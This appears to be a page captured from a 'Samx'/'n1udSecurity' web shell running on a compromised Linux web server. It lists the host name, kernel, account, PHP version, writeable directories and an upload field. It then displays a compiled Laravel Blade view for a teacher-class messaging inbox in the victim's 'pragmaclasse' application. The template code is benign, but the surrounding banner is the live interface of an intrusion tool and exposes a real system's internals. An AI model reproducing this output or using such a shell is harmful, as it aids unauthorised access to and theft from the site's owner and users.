Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/pragmaclasse_recette/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/pragmaclasse_recette/storage/framework/views/4e49705ab530f6fd2edca66383dcba15447876c9.php
<div class="bloc-manager-container">
    <div class="bloc-manager bg-info text-white inbox-part" v-if="display == 'inbox'">
        <?php echo $__env->make('partials.components.teacher.class.messages.listHead', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
        <template v-if="!filAffiche">
            <table class="liste-fils" v-if="filteredListeFils.length > 0">

                <thead class="thead-dark">
                    <tr>
                        <th scope="col" class="action-sort col-title" @click.prevent="sortMessages('title')">Titre</th>
                        <th scope="col" class="action-sort col-subject" @click.prevent="sortMessages('subject')">Sujet
                        </th>
                        <th scope="col" class="action-sort col-sender" @click.prevent="sortMessages('sender')">
                            Expéditeur</th>
                        <th scope="col" class="action-sort col-receiver" @click.prevent="sortMessages('receiver')">
                            Destinataire</th>
                        <th scope="col" class="action-sort col-date" @click.prevent="sortMessages('date')">Date</th>
                        <th scope="col" class="action-sort col-date" @click.prevent="sortMessages('dateLast')">Date dernier message</th>
                    </tr>
                </thead>
                <tbody>
                    <tr class="single-message-line" v-for="fil in filteredListeFils" @click="ouvrirFil(fil.idFil)">
                        <td>{{fil.titre}}</td>
                        <td>{{displaysubject(fil.idSujet)}}</td>
                        <td>{{fil.sender.prenom + ' ' + fil.sender.nom}}</td>
                        <td v-html="afficherDestinataire(fil)"></td>
                        <td>{{displayDate(fil)}}</td>
                        <td>{{displayDate(fil, 'recent_timestamp')}}</td>
                    </tr>
                </tbody>
            </table>
        </template>
        <template v-else>
            <teacher-class-messages-collective-thread v-if="typeMessages == 'collective'" :class-prop="classProp" :type-messages="typeMessages" :dictionaries="dictionaries"
                :all-levels="allLevels" :fil="filAffiche" :fil-id="filAffiche.idFil" @answered="answered"></teacher-class-messages-collective-thread>
            <teacher-class-messages-personnal-thread v-if="typeMessages == 'personnal'" :class-prop="classProp" :type-messages="typeMessages" :dictionaries="dictionaries"
                :all-levels="allLevels" :fil="filAffiche" @answered="answered"></teacher-class-messages-personnal-thread>
        </template>
    </div>
    <template v-if="display == 'new'">
        <?php echo $__env->make('partials.components.teacher.class.messages.newHead', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
    </template>
</div><?php /**PATH /home/pragmatice/pragmaclasse_recette/resources/views/components/teacher/class/messages/list.blade.php ENDPATH**/ ?>

SAMX